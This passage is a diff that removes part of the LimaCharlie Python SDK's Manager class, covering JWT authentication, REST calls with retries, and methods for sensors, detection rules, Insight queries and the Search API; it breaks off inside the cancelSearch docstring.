-            # Use custom SSL context to handle OpenSSL 3.0+ stricter EOF handling
-            ssl_context = _create_ssl_context()
-            if not _IS_PYTHON_2 and ssl_context is not None:
-                u = urlopen( request, context = ssl_context )
-            else:
-                u = urlopen( request )
-            self._jwt = json.loads( u.read().decode() )[ 'jwt' ]
-            u.close()
-        except HTTPError as e:
-            # Handle HTTP errors from JWT generation service
-            code = e.code
-            error_body = e.read().decode() if hasattr(e, 'read') else str(e)
-            self._jwt = None
-
-            # Check for MFA-related errors
-            if 'multi-factor authentication' in error_body.lower() or 'mfa' in error_body.lower():
-                error_msg = (
-                    'Multi-factor authentication is required but was not performed.\n'
-                    'Your account has 2FA enabled. Please re-authenticate using:\n'
-                    '  limacharlie login --oauth\n'
-                    'This will prompt you for your second factor during login.'
-                )
-                raise LcApiException(error_msg, code=code)
-
-            raise LcApiException( 'Failed to get JWT: %s' % ( error_body, ), code=code)
-        except Exception as e:
-            # Handle other exceptions
-            code = e.__dict__.get("code", None)
-            self._jwt = None
-            raise LcApiException( 'Failed to get JWT: %s' % ( e, ), code=code)
-
-    def _restCall( self, url: str, verb: str, params: dict[str, Any] = {}, altRoot: Optional[str] = None, queryParams: Optional[dict[str, Any]] = None, rawBody: Optional[str] = None, contentType: Optional[str] = None, isNoAuth: bool = False, timeout: Optional[int] = None ) -> tuple[int, dict[str, Any]]:
-        try:
-            resp = None
-            if not isNoAuth:
-                headers = { "Authorization" : "bearer %s" % self._jwt }
-            else:
-                headers = {}
-
-            if altRoot is None:
-                url = '%s/%s/%s' % ( ROOT_URL, API_VERSION, url )
-            else:
-                if url:
-                    url = '%s/%s' % ( altRoot, url )
-                else:
-                    url = altRoot
-
-            if queryParams is not None:
-                url = '%s?%s' % ( url, urlencode( queryParams ) )
-
-            request = URLRequest( url,
-                                  rawBody if rawBody is not None else urlencode( params, doseq = True ).encode(),
-                                  headers = headers )
-            request.get_method = lambda: verb
-            request.add_header( 'User-Agent', _build_user_agent() )
-            if contentType is not None:
-                request.add_header( 'Content-Type', contentType )
-
-            # Use custom SSL context to handle OpenSSL 3.0+ stricter EOF handling
-            ssl_context = _create_ssl_context()
-            if not _IS_PYTHON_2 and ssl_context is not None and url.startswith('https'):
-                u = urlopen( request, timeout = timeout, context = ssl_context )
-            else:
-                u = urlopen( request, timeout = timeout )
-            try:
-                data = u.read()
-                if 0 != len( data ):
-                    resp = json.loads( data.decode() )
-                else:
-                    resp = {}
-            except ValueError as e:
-                LcApiException( "Failed to decode data from API: %s" % e )
-            u.close()
-            ret = ( 200, resp )
-
-            # Prior to enforcement of rate limits, we return the headers
-            # in the response. Display the warning in stderr.
-            headers = u.getheaders()
-            quotaLimit = None
-            quotaPeriod = None
-            for header in headers:
-                if header[0] == 'X-RateLimit-Quota':
-                    quotaLimit = int(header[1])
-                if header[0] == 'X-RateLimit-Period':
-                    quotaPeriod = int(header[1])
-            if quotaLimit is not None or quotaPeriod is not None:
-                print(f"Warning: Rate limit hit, quota limit: {quotaLimit}, quota period: {quotaPeriod} seconds, see https://docs.limacharlie.io/v2/docs/en/api-keys?highlight=bulk", file=sys.stderr)
-
-        except HTTPError as e:
-            errorBody = e.read()
-            try:
-                ret = ( e.getcode(), json.loads( errorBody.decode() ) )
-            except:
-                ret = ( e.getcode(), errorBody )
-        except ssl.SSLError as e:
-            # Handle SSL errors (including SSLEOFError from OpenSSL 3.0+)
-            # Treat as a transient error similar to gateway timeout so retry logic kicks in
-            error_msg = f"SSL error occurred: {str(e)}"
-            self._printDebug(error_msg)
-            ret = ( HTTP_GATEWAY_TIMEOUT, { "error": error_msg } )
-
-        if rawBody:
-            body = rawBody.decode("utf-8")
-        else:
-            body = rawBody
-
-        self._printDebug("Request information:")
-        self._printDebug( "%s: %s ( params=%s,body=%s ) ==> %s ( %s )" % ( verb, url, body, str( params ), ret[ 0 ], str( ret[ 1 ] ) ) )
-        self._printDebug("cURL command:")
-        self._printDebug(getCurlCommandString(request=request))
-
-        return ret
-
-    # TODO: Fix mutable default (dict) in params
-    def _apiCall( self, url: str, verb: str, params: dict[str, Any] = {}, altRoot: Optional[str] = None, queryParams: Optional[dict[str, Any]] = None, rawBody: Optional[str] = None, contentType: Optional[str] = None, isNoAuth: bool = False, nMaxTotalRetries: int = 3, timeout: int = 60 * 10 ) -> dict[str, Any]:
-        hasAuthRefreshed = False
-        nRetries = 0
-
-        # If no JWT is ready, prime it.
-        if not isNoAuth and self._jwt is None:
-            if self._onRefreshAuth is not None:
-                self._onRefreshAuth( self )
-            else:
-                self._refreshJWT()
-
-        while nRetries < nMaxTotalRetries:
-            nRetries += 1
-
-            code, data = self._restCall( url, verb, params, altRoot = altRoot, queryParams = queryParams, rawBody = rawBody, contentType = contentType, isNoAuth = isNoAuth, timeout = timeout )
-
-            if code == HTTP_UNAUTHORIZED:
-                if hasAuthRefreshed:
-                    # We already renewed the JWT once.
-                    break
-                elif not isNoAuth:
-                    # Do our one JWT renew attempt.
-                    hasAuthRefreshed = True
-                    if self._onRefreshAuth is not None:
-                        self._onRefreshAuth( self )
-                    else:
-                        if self._jwt is not None and self._secret_api_key is None:
-                            # This is a case where we likely initialized the manager with a JWT,
-                            # but no API key. In this case, we can't refresh the JWT, so we'll
-                            # just fail.
-                            # Mask sensitive values in error message
-                            raise LcApiException( 'Auth error and no API key available: oid=%s uid=%s: %s' % ( _mask_secret( self._oid ), _mask_secret( self._uid ), data, ), code=code)
-                        self._refreshJWT()
-                    continue
-                else:
-                    # Auth failed, can't renew.
-                    break
-
-            if code == HTTP_TOO_MANY_REQUESTS and self._isRetryQuotaErrors:
-                # Out of quota, wait a bit and retry.
-                time.sleep( 10 )
-                continue
-
-            if code == HTTP_GATEWAY_TIMEOUT:
-                # The API gateway timed out talking to the
-                # backend, we'll give it another shot.
-                continue
-
-            # Some other status code, including 200, so we're done.
-            break
-
-        if code != HTTP_OK:
-            raise LcApiException( 'Api failure (%s): %s' % ( code, str( data ) ) )
-
-        return data
-
-    def shutdown( self ):
-        '''Shut down any active mechanisms like interactivity.
-        '''
-        if self._spout is not None:
-            self._spout.shutdown()
-            self._spout = None
-
-    def make_interactive( self ):
-        '''Enables interactive mode on this instance if it was not created with is_interactive.
-        '''
-        if self._is_interactive:
-            return
-
-        if not self._inv_id:
-            raise LcApiException( 'Investigation ID must be set for interactive mode to be enabled.' )
-
-        self._is_interactive = True
-        self._refreshSpout()
-
-    def testAuth( self, permissions = [] ):
-        '''Tests authentication with limacharlie.io.
-
-        Args:
-            permissions (list): optional list of permissions validate we have.
-
-        Returns:
-            a boolean indicating whether authentication succeeded.
-        '''
-        # Helper to print user-friendly errors during tests (but not on CI to avoid leaking secrets)
-        is_local_test = _is_running_in_tests() and not _is_running_on_ci()
-
-        def _print_auth_error( message, include_context = True ):
-            if _is_running_on_ci():
-                # On CI, only print minimal error without any context to avoid secret leakage
-                print( "Auth Error: %s" % message, file = sys.stderr )
-            elif is_local_test and include_context:
-                # Provide more context during local tests with masked secrets
-                context = "Auth Error [oid=%s, key=%s]: %s" % (
-                    _mask_secret( self._oid ),
-                    _mask_secret( self._secret_api_key ),
-                    message
-                )
-                print( context, file = sys.stderr )
-            else:
-                print( message, file = sys.stderr )
-
-        try:
-            perms = None
-
-            # First make sure we have an API key or JWT.
-            if self._secret_api_key is not None:
-                try:
-                    if self._onRefreshAuth is not None:
-                        self._onRefreshAuth( self )
-                    else:
-                        self._refreshJWT()
-                except:
-                    err_msg = str( sys.exc_info()[1] )
-                    _print_auth_error( "Failed to refresh JWT using API key: %s" % err_msg )
-                    if is_local_test:
-                        print( "  Hint: Check that the API key is valid and has not expired.", file = sys.stderr )
-                    return False
-            elif self._jwt is not None:
-                try:
-                    perms = self.whoAmI()
-                except:
-                    _print_auth_error( "Failed to validate JWT token." )
-                    if is_local_test:
-                        print( traceback.format_exc(), file = sys.stderr )
-                    return False
-            else:
-                _print_auth_error( "Neither API key nor JWT present for authentication." )
-                if is_local_test:
-                    print( "  Hint: Ensure --oid and --key are passed to pytest, or set LC_OID and LC_API_KEY environment variables.", file = sys.stderr )
-                return False
-
-            # If there are no permissions to check, we're good since
-            # the previous part of this check made sure our auth was
-            # at least valid.
-            if permissions is None or 0 == len( permissions ):
-                return True
-
-            # We need to check the permissions we have.
-            if perms is None:
-                perms = self.whoAmI()
-            if 'user_perms' in perms:
-                # This is from a user token with permissions to multiple
-                # organizations.
-                effective = perms[ 'user_perms' ].get( self._oid, [] )
-            else:
-                # This is a machine token. Check the current OID is in there.
-                if self._oid in perms.get( 'orgs', [] ):
-                    effective = perms.get( 'perms', [] )
-                else:
-                    effective = []
-
-            # Now just check if we have them all.
-            missing_perms = [ p for p in permissions if p not in effective ]
-            if missing_perms:
-                _print_auth_error( "Missing required permissions." )
-                if is_local_test:
-                    print( "  Required permissions: %s" % str( permissions ), file = sys.stderr )
-                    print( "  Effective permissions: %s" % str( effective ), file = sys.stderr )
-                    print( "  Missing permissions: %s" % str( missing_perms ), file = sys.stderr )
-                    print( "  Hint: Update the API key to include the missing permissions.", file = sys.stderr )
-                elif not _is_running_on_ci():
-                    print( "Expected %s permissions, got %s" % ( str( permissions ), str( effective ) ), file = sys.stderr )
-                return False
-            return True
-        except:
-            _print_auth_error( "Unexpected error during authentication." )
-            if not _is_running_on_ci():
-                print( traceback.format_exc(), file = sys.stderr )
-            return False
-
-    def whoAmI( self ):
-        '''Query the API to see which organizations we are authenticated for.
-
-        Returns:
-            A list of organizations and permissions, or a dictionary of organizations with the related permissions.
-        '''
-        resp = self._apiCall( 'who', GET, {}, altRoot =  "%s/%s" % ( ROOT_URL, API_VERSION ) )
-        return resp
-
-    def userAccessibleOrgs( self, offset = None, limit = None, filter = None, sort_by = None, sort_order = None, with_names = True ):
-        '''Query the API to see which organizations the user has access to.
-
-        Args:
-            offset (int): number of organizations to skip from the start.
-            limit (int): maximum number of organizations to return (default 10).
-            filter (str): case-insensitive substring filter on name, description, or oid.
-            sort_by (str): field to sort by: 'name' or 'description' (default: 'name').
-            sort_order (str): sort order: 'asc' or 'desc' (default: 'asc').
-            with_names (bool): if True (default), include organization names in the response.
-
-        Returns:
-            A dict with 'orgs' key containing a list of OIDs and optional 'names' key with OID->name mapping.
-        '''
-        queryParams = {}
-        if offset is not None:
-            queryParams['offset'] = str(offset)
-        if limit is not None:
-            queryParams['limit'] = str(limit)
-        if filter is not None:
-            queryParams['filter'] = filter
-        if sort_by is not None:
-            queryParams['sort_by'] = sort_by
-        if sort_order is not None:
-            queryParams['sort_order'] = sort_order
-
-        # Use a minimal JWT for this endpoint to avoid 413 errors when users have many orgs.
-        # The /user/orgs endpoint only needs the UID claim - it queries Firebase directly
-        # for org permissions. Using a minimal JWT (oid="-") prevents the Authorization header
-        # from exceeding HTTP header size limits (typically ~8KB) which can happen when the JWT
-        # contains permissions for hundreds of organizations.
-        original_jwt = self._jwt
-        try:
-            self._refreshJWT( oid_override = "-" )
-            resp = self._apiCall( 'user/orgs', GET, queryParams = queryParams )
-        finally:
-            self._jwt = original_jwt
-
-        # Transform response to match old format
-        orgs_list = resp.get('orgs', [])
-
-        # Extract OIDs as a list
-        oids = [org.get('oid') for org in orgs_list if org.get('oid')]
-
-        ret_data = {
-            'orgs': oids
-        }
-
-        # Include names if requested
-        if with_names:
-            names = {org.get('oid'): org.get('name') for org in orgs_list if org.get('oid')}
-            ret_data['names'] = names
-
-        return ret_data
-
-    def getOrgInfo( self ) -> dict[str, Any]:
-        return self._apiCall( 'orgs/%s' % ( self._oid, ), GET, {} )
-
-    def sensor( self, sid, inv_id = None, detailedInfo = None ):
-        '''Get a Sensor object for the specific Sensor ID.
-
-        The sensor may or may not be online.
-
-        Args:
-            sid (uuid str): the Sensor ID to represent.
-            inv_id (str): investigation ID to add to all actions done using this object.
-
-        Returns:
-            a Sensor object.
-        '''
-
-        s = Sensor( self, sid, detailedInfo = detailedInfo )
-        if inv_id is not None:
-            s.setInvId( inv_id )
-        elif self._inv_id is not None:
-            s.setInvId( self._inv_id )
-        return s
-
-    def sensors( self, inv_id = None, selector = None, limit = None, with_ip = None, with_hostname_prefix = None ):
-        '''Gets all Sensors in the Organization.
-
-        The sensors may or may not be online.
-
-        Args:
-            inv_id (str): investigation ID to add to all actions done using these objects.
-            selector (str): sensor selector expression to use as filter.
-            limit (int): max number of sensors per page of result.
-            with_ip (str): list sensors with the specific internal or external ip.
-            with_hostname_prefix (str): list sensors with the specific hostname prefix.
-
-        Returns:
-            a generator of Sensor objects.
-        '''
-
-        continuationToken = None
-
-        while True:
-            params = {}
-
-            if continuationToken is not None:
-                params[ 'continuation_token' ] = continuationToken
-            if selector is not None:
-                params[ 'selector' ] = selector
-            if limit is not None:
-                params[ 'limit' ] = limit
-            if with_ip is not None:
-                params[ 'with_ip' ] = with_ip
-            if with_hostname_prefix is not None:
-                params[ 'with_hostname_prefix' ] = with_hostname_prefix
-
-            resp = self._apiCall( 'sensors/%s' % self._oid, GET, queryParams = params )
-            if inv_id is None:
-                inv_id = self._inv_id
-
-            for s in resp[ 'sensors' ]:
-                yield self.sensor( s[ 'sid' ], inv_id, detailedInfo = s )
-
-            continuationToken = resp.get( 'continuation_token', None )
-            if continuationToken is None:
-                break
-
-    def sensorsWithTag( self, tag ):
-        '''Get a list of sensors that have the matching tag.
-
-        Args:
-            tag (str): a tag to look for.
-
-        Returns:
-            a list of Sensor objects.
-        '''
-
-        resp = self._apiCall( 'tags/%s/%s' % ( self._oid, urlescape( tag, safe = '' ) ), GET, queryParams = {} )
-        return [ Sensor( self, sid ) for sid in resp.keys() ]
-
-    def getAllTags( self ):
-        '''Get a list of tags in use by sensors.
-
-        Returns:
-            a list of tags.
-        '''
-
-        return self._apiCall( 'tags/%s' % ( self._oid, ), GET, queryParams = {} )[ 'tags' ]
-
-    def getAllOnlineSensors( self, onlySIDs = [] ):
-        '''Get a list of all online sensors.
-
-        Args:
-            onlySIDs (list of str): optional list of SIDs to check.
-
-        Returns:
-            a list of SIDs.
-        '''
-
-        req = {}
-        if onlySIDs:
-            req[ 'sids' ] = onlySIDs
-
-        return list( k for k, v in self._apiCall( 'online/%s' % ( self._oid, ), POST, req, queryParams = {} ).items() if v )
-
-    def outputs( self ):
-        '''Get the list of all Outputs configured for the Organization.
-
-        Returns:
-            a list of Output descriptions (JSON).
-        '''
-
-        resp = self._apiCall( 'outputs/%s' % self._oid, GET )
-        return resp.get( self._oid, {} )
-
-    def del_output( self, name ):
-        '''Remove an Output from the Organization.
-
-        Args:
-            name (str): the name of the Output to remove.
-
-        Returns:
-            the REST API response (JSON).
-        '''
-
-        return self._apiCall( 'outputs/%s' % self._oid, DELETE, { 'name' : name } )
-
-    def add_output( self, name, module, type, **kwargs ):
-        '''Add an Output to the Organization.
-
-        For detailed explanation and possible Output module parameters
-        see the official documentation, naming is the same as for the
-        REST interface.
-
-        Args:
-            name (str): name to give to the Output.
-            module (str): name of the Output module to use.
-            type (str): type of Output stream.
-            **kwargs: arguments specific to the Output module, see official doc.
-
-        Returns:
-            the REST API response (JSON).
-        '''
-
-        req = { 'name' : name, 'module' : module, 'type' : type }
-        for k, v in kwargs.items():
-            req[ k ] = v
-        return self._apiCall( 'outputs/%s' % self._oid, POST, req )
-
-    def hosts( self, hostname_expr, as_dict = False ):
-        '''Get the Sensor objects for hosts matching a hostname expression.
-
-        Args:
-            hostname_expr (str): hostname prefix to look for.
-
-
-        Returns:
-            a list of Sensor IDs matching the hostname expression.
-        '''
-
-        return self.getSensorsWithHostname( hostname_expr, as_dict = as_dict )
-
-    def rules( self, namespace = None ):
-        '''DEPRECATED, use Hive accessors instead. Get the list of all Detection & Response rules for the Organization.
-
-        Args:
-            namespace (str): optional namespace to operator on, defaults to "general".
-
-        Returns:
-            a list of D&R rules (JSON).
-        '''
-
-        req = {}
-        if namespace is not None:
-            req[ 'namespace' ] = namespace
-
-        resp = self._apiCall( 'rules/%s' % self._oid, GET, queryParams = req )
-        return resp
-
-    def del_rule( self, name, namespace = None ):
-        '''DEPRECATED, use Hive accessors instead. Remove a Rule from the Organization.
-
-        Args:
-            name (str): the name of the Rule to remove.
-            namespace (str): optional namespace to operator on, defaults to "general".
-
-        Returns:
-            the REST API response (JSON).
-        '''
-
-        req = {
-            'name' : name,
-        }
-        if namespace is not None:
-            req[ 'namespace' ] = namespace
-
-        return self._apiCall( 'rules/%s' % self._oid, DELETE, req )
-
-    def add_rule( self, name, detection, response, isReplace = False, namespace = None, isEnabled = True, ttl = None ):
-        '''DEPRECATED, use Hive accessors instead. Add a Rule to the Organization.
-
-        For detailed explanation and possible Rules parameters
-        see the official documentation, naming is the same as for the
-        REST interface.
-
-        Args:
-            name (str): name to give to the Rule.
-            namespace (str): optional namespace to operator on, defaults to "general".
-            isReplace (boolean): if True, replace existing Rule with the same name.
-            detection (dict): dictionary representing the detection component of the Rule.
-            response (list): list representing the response component of the Rule.
-            isEnabled (boolean): if True (default), the rule is enabled.
-            ttl (int): number of seconds before the rule should be auto-deleted.
-
-        Returns:
-            the REST API response (JSON).
-        '''
-
-        expireOn = None
-        if ttl is not None:
-            expireOn = str( int( time.time() ) + int( ttl ) )
-
-        req = {
-            'name' : name,
-            'is_replace' : 'true' if isReplace else 'false',
-            'detection' : json.dumps( detection ),
-            'response' : json.dumps( response ),
-            'is_enabled' : 'true' if isEnabled else 'false',
-        }
-
-        if expireOn is not None:
-            req[ 'expire_on' ] = expireOn
-
-        if namespace is not None:
-            req[ 'namespace' ] = namespace
-
-        return self._apiCall( 'rules/%s' % self._oid, POST, req )
-
-    def fps( self ):
-        '''DEPRECATED, use Hive accessors instead. Get the list of all False Positive rules for the Organization.
-
-        Returns:
-            a list of False Positive rules (JSON).
-        '''
-
-        req = {}
-
-        resp = self._apiCall( 'fp/%s' % self._oid, GET, queryParams = req )
-        return resp
-
-    def del_fp( self, name ):
-        '''DEPRECATED, use Hive accessors instead. Remove a False Positive rule from the Organization.
-
-        Args:
-            name (str): the name of the rule to remove.
-
-        Returns:
-            the REST API response (JSON).
-        '''
-
-        req = {
-            'name' : name,
-        }
-
-        return self._apiCall( 'fp/%s' % self._oid, DELETE, req )
-
-    def add_fp( self, name, rule, isReplace = False, ttl = None ):
-        '''DEPRECATED, use Hive accessors instead. Add a False Positive rule to the Organization.
-
-        For detailed explanation and possible rules parameters
-        see the official documentation, naming is the same as for the
-        REST interface.
-
-        Args:
-            name (str): name to give to the rule.
-            isReplace (boolean): if True, replace existing rule with the same name.
-            detection (dict): dictionary representing the False Positive rule content.
-            ttl (int): number of seconds before the rule should be auto-deleted.
-
-        Returns:
-            the REST API response (JSON).
-        '''
-
-        expireOn = None
-        if ttl is not None:
-            expireOn = str( int( time.time() ) + int( ttl ) )
-
-        req = {
-            'name' : name,
-            'is_replace' : 'true' if isReplace else 'false',
-            'rule' : json.dumps( rule ),
-        }
-
-        if expireOn is not None:
-            req[ 'expire_on' ] = expireOn
-
-        return self._apiCall( 'fp/%s' % self._oid, POST, req )
-
-    def isInsightEnabled( self ):
-        '''Check to see if Insight (retention) is enabled on this organization.
-
-        Returns:
-            True if Insight is enabled.
-        '''
-        data = self._apiCall( 'insight/%s' % ( self._oid, ), GET )
-        if data.get( 'insight_bucket', None ):
-            return True
-        return False
-
-    def getHistoricDetections( self, start, end, limit = None, cat = None ):
-        '''Get the detections for this organization between the two times, requires Insight (retention) enabled.
-
-        Args:
-            start (int): start unix (seconds) timestamp to fetch detects from.
-            end (int): end unix (seconds) timestamp to feth detects to.
-            limit (int): maximum number of detects to return.
-            cat (str): return dects only from this category.
-
-        Returns:
-            a generator of detects.
-        '''
-        cursor = '-'
-        start = int( start )
-        end = int( end )
-        if limit is not None:
-            limit = int( limit )
-
-        req = {
-            'start' : start,
-            'end' : end,
-            'is_compressed' : 'true',
-        }
-
-        if limit is not None:
-            req[ 'limit' ] = limit
-
-        if cat is not None:
-            req[ 'cat' ] = cat
-
-        nReturned = 0
-        while cursor:
-            req[ 'cursor' ] = cursor
-            data = self._apiCall( 'insight/%s/detections' % ( self._oid, ), GET, queryParams = req )
-            cursor = data.get( 'next_cursor', None )
-            for detect in self._unwrap( data[ 'detects' ] ):
-                yield detect
-                nReturned += 1
-                if limit is not None and limit <= nReturned:
-                    break
-            if limit is not None and limit <= nReturned:
-                break
-
-    def getAuditLogs( self, start, end, limit = None, event_type = None, sid = None ):
-        '''Get the audit logs for the organization.
-
-        Args:
-            start (int): start unix (seconds) timestamp to fetch detects from.
-            end (int): end unix (seconds) timestamp to feth detects to.
-            limit (int): maximum number of detects to return.
-            event_type (str): only return this audit event.
-            sid (str): only return audit logs relating to this sensor id.
-
-        Returns:
-            a generator of detects.
-        '''
-        cursor = '-'
-        start = int( start )
-        end = int( end )
-        if limit is not None:
-            limit = int( limit )
-
-        req = {
-            'start' : start,
-            'end' : end,
-            'is_compressed' : 'true',
-        }
-
-        if limit is not None:
-            req[ 'limit' ] = limit
-
-        if event_type is not None:
-            req[ 'event_type' ] = event_type
-
-        if sid is not None:
-            req[ 'sid' ] = sid
-
-        nReturned = 0
-        while cursor:
-            req[ 'cursor' ] = cursor
-            data = self._apiCall( 'insight/%s/audit' % ( self._oid, ), GET, queryParams = req )
-            cursor = data.get( 'next_cursor', None )
-            for detect in self._unwrap( data[ 'events' ] ):
-                yield detect
-                nReturned += 1
-                if limit is not None and limit <= nReturned:
-                    break
-            if limit is not None and limit <= nReturned:
-                break
-
-    def getHistoricDetectionByID( self, detect_id ):
-        '''Get the detection with a specific detect_id.
-
-        Args:
-            detect_id (str): the ID (detect_id) of the detection to fetch.
-
-        Returns:
-            a detection.
-        '''
-        return self._apiCall( 'insight/%s/detections/%s' % ( self._oid, detect_id, ), GET )
-
-    def getObjectInformation( self, objType, objName, info, isCaseSensitive = True, isWithWildcards = False, limit = None, isPerObject = None ):
-        '''Get information about an object (indicator) using Insight (retention) data.
-
-        Args:
-            objType (str): the object type to query for, one of: user, domain, ip, hash, file_path, file_name.
-            objName (str): the name of the object to query for, like "cmd.exe".
-            info (str): the type of information to query for, one of: summary, locations.
-            isCaseSensitive (bool): False to ignore case in the object name.
-            isWithWildcards (bool): True to enable use of "%" wildcards in the object name.
-            limit (int): optional maximum number of sensors/logs to report, or None for LimaCharlie default.
-            isPerObject (bool): if set, specifies if the results should be groupped per object when a wildcard is present.
-
-        Returns:
-            a dict with the requested information.
-        '''
-        infoTypes = ( 'summary', 'locations' )
-        objTypes = ( 'user', 'domain', 'ip', 'file_hash', 'file_path', 'file_name', 'service_name', 'package_name' )
-
-        if info not in infoTypes:
-            raise Exception( 'invalid information type: %s, choose one of %s' % ( info, infoTypes ) )
-
-        if objType not in objTypes:
-            raise Exception( 'invalid object type: %s, choose one of %s' % ( objType, objTypes ) )
-
-        perObject = isPerObject
-        if perObject is None:
-            perObject = 'true' if ( isWithWildcards and 'summary' == info ) else 'false'
-        else:
-            perObject = 'true' if perObject else 'false'
-
-        req = {
-            'name' : objName,
-            'info' : info,
-            'case_sensitive' : 'true' if isCaseSensitive else 'false',
-            'with_wildcards' : 'true' if isWithWildcards else 'false',
-            'per_object' : perObject,
-        }
-
-        if limit is not None:
-            req[ 'limit' ] = str( limit )
-
-        data = self._apiCall( 'insight/%s/objects/%s' % ( self._oid, objType ), GET, queryParams = req )
-        return data
-
-    def getBatchObjectInformation( self, objects, isCaseSensitive = True ):
-        '''Get object prevalence information in a batch.
-
-        Args:
-            objects (dict): dictionary of object type to list of object names to query for (objects["file_name"] = ["a.exe", "b.exe"]).
-            isCaseSensitive (bool): False to ignore case in the object name.
-
-        Returns:
-            a dict with keys as time ranges and values are maps of object types to object name lists.
-        '''
-        for objType, objNames in objects.items():
-            objects[ objType ] = list( objNames )
-        req = {
-            'objects' : json.dumps( objects ),
-            'case_sensitive' : 'true' if isCaseSensitive else 'false',
-        }
-        data = self._apiCall( 'insight/%s/objects' % ( self._oid, ), POST, req )
-        return data
-
-    def getInsightHostCountPerPlatform( self ):
-        '''Get the number of hosts for each platform for which we have long term Insight data.
-
-        Returns:
-            a dict with "mac", "linux" and "windows" and their count tuples [1,7,30].
-        '''
-        macBin = 'launchd'
-        winBin = 'ntdll.dll'
-        data = self.getBatchObjectInformation( {
-            'file_name' : [
-                macBin,
-                winBin,
-            ]
-        } )
-
-        if data is None:
-            return data
-
-        return {
-            'mac' : ( data.get( 'last_1_days', {} ).get( 'file_name', {} ).get( macBin, 0 ), data.get( 'last_7_days', {} ).get( 'file_name', {} ).get( macBin, 0 ), data.get( 'last_30_days', {} ).get( 'file_name', {} ).get( macBin, 0 ) ),
-            'windows' : ( data.get( 'last_1_days', {} ).get( 'file_name', {} ).get( winBin, 0 ), data.get( 'last_7_days', {} ).get( 'file_name', {} ).get( winBin, 0 ), data.get( 'last_30_days', {} ).get( 'file_name', {} ).get( winBin, 0 ) ),
-            'linux' : ( None, None, None ),
-        }
-
-    def getSensorsWithHostname( self, hostnamePrefix, as_dict = False ):
-        '''Get the list of sensor IDs and hostnames that match the given prefix.
-
-        Args:
-            hostnamePrefix (str): a hostname prefix to search for.
-
-        Returns:
-            List of (sid, hostname).
-        '''
-        data = self._apiCall( 'hostnames/%s' % ( self._oid, ), GET, queryParams = {
-            'hostname' : hostnamePrefix,
-            'as_dict' : 'true' if as_dict else 'false',
-        } )
-        return data.get( 'sid', None )
-
-    def getSensorsWithIp( self, ip, start, end ):
-        '''Get the list of sensor IDs that used the given IP during the time range.
-
-        Args:
-            ip (str): the IP address used.
-            start (int): beginning of the time range to look for.
-            end (int): end of the time range to look for.
-
-        Returns:
-            List of sid.
-        '''
-        data = self._apiCall( 'ips/%s' % ( self._oid, ), GET, queryParams = {
-            'ip' : str( ip ),
-            'start' : int( start ),
-            'end' : int( end ),
-        } )
-        return data.get( 'sid', None )
-
-    def _getSearchUrl( self ):
-        '''Get the Search API URL for this organization.
-
-        The Search API uses a different base URL than the standard API,
-        which is retrieved from the organization's URLs endpoint.
-
-        Parameters:
-            None
-
-        Return:
-            str: The base URL for the Search API (includes /v1 prefix).
-        '''
-        # Return cached URL if available
-        if self._search_url is not None:
-            return self._search_url
-
-        # Fetch org URLs
-        urls = self.getOrgURLs()
-        if urls is None or 'search' not in urls:
-            raise LcApiException( 'Search API URL not available for this organization' )
-
-        # Get the search URL and add https:// if needed
-        search_url = urls['search']
-        if not search_url.startswith('http://') and not search_url.startswith('https://'):
-            search_url = 'https://' + search_url
-
-        # Add /v1 API version prefix
-        search_url = search_url.rstrip('/') + '/v1'
-
-        # Cache and return the search URL
-        self._search_url = search_url
-        return self._search_url
-
-    def validateSearch( self, query, start_time, end_time, stream = None ):
-        '''Validate a search query and get estimated pricing.
-
-        Args:
-            query (str): the search query to validate.
-            start_time (int): the start time (epoch seconds) for the search.
-            end_time (int): the end time (epoch seconds) for the search.
-            stream (str): optional stream name to search (e.g., "event", "detect", "audit").
-
-        Returns:
-            Dict with validation results including query, startTime, endTime, error (if any), and estimatedPrice.
-        '''
-        req = {
-            'oid': self._oid,
-            'query': query,
-            'startTime': str( start_time ),
-            'endTime': str( end_time ),
-        }
-        if stream is not None:
-            req['stream'] = stream
-
-        # Use the Search API URL
-        search_url = self._getSearchUrl()
-        data = self._apiCall( 'search/validate', POST, rawBody = json.dumps( req ).encode(), contentType = 'application/json', altRoot = search_url )
-        return data
-
-    def initiateSearch( self, query, start_time, end_time, paginated = True, stream = None ):
-        '''Initiate a new search query.
-
-        Args:
-            query (str): the search query to execute.
-            start_time (int): the start time (epoch seconds) for the search.
-            end_time (int): the end time (epoch seconds) for the search.
-            paginated (bool): whether to enable pagination for the search results (default: True).
-            stream (str): optional stream name to search (e.g., "event", "detect", "audit").
-
-        Returns:
-            Dict with queryId for the initiated search.
-        '''
-        req = {
-            'oid': self._oid,
-            'query': query,
-            'startTime': str( start_time ),
-            'endTime': str( end_time ),
-            'paginated': paginated,
-        }
-        if stream is not None:
-            req['stream'] = stream
-
-        # Use the Search API URL
-        search_url = self._getSearchUrl()
-        data = self._apiCall( 'search', POST, rawBody = json.dumps( req ).encode(), contentType = 'application/json', altRoot = search_url )
-        return data
-
-    def cancelSearch( self, query_id ):
-        '''Cancel a running search query.
-
-        Sends a DELETE request to cancel an in-progress search. Useful for
-        stopping long-running queries or implementing timeout mechanisms.
-
-        Parameters:
-            query_id (str): the query ID returned from initiateSearch.
-
-        Return:
-            Dict with the API response containing cancellation status.
-
-        Usage Examples:
-            # Example 1: Basic cancellation
-            >>> manager = Manager()
-            >>> init_response = manager.initiateSearch("event_type = NEW_PROCESS", start_time, end_time)
-            >>> query_id = init_response['queryId']
-            >>> # Cancel the search
-            >>> result = manager.cancelSearch(query_id)
-
-            # Example 2: Timeout mechanism
-            >>> import signal
-            >>> query_id = None
-            >>> def timeout_handler(signum, frame):
-            ...     if query_id:
-            ...         manager.cancelSearch(query_id)
-            ...     raise TimeoutError("Search exceeded timeout")
-            >>> signal.signal(signal.SIGALRM, timeout_handler)
-            >>> signal.alarm(300)  # 5 minute timeout
-            >>> try:
-            ...     for result in manager.executeSearch(query, start, end, on_query_initiated=lambda qid: globals().update(query_id=qid)):
-            ...         process(result)
-            ... finally:
-            ...     signal.alarm(0)  # Cancel alarm
-
-            # Example 3: User cancellation in interactive application
-            >>> def run_search_with_cancellation(manager, query, start, end):
-            ...     query_id = None
-            ...     def on_initiated(qid):
-            ...         nonlocal query_id
-            ...         query_id = qid
-            ...         print(f"Search started: {qid}")
-            ...         print("Press Ctrl+C to cancel")
-            ...     try:
-            ...         for result in manager.executeSearch(query, start, end, on_query_initiated=on_initiated):
-            ...             yield result
-            ...     except KeyboardInterrupt:
-            ...         if query_id:
-            ...             print(f"Canceling search {query_id}...")
-            ...             manager.cancelSearch(query_id)
-            ...         raise
-        '''
-        # Get the Search API URL
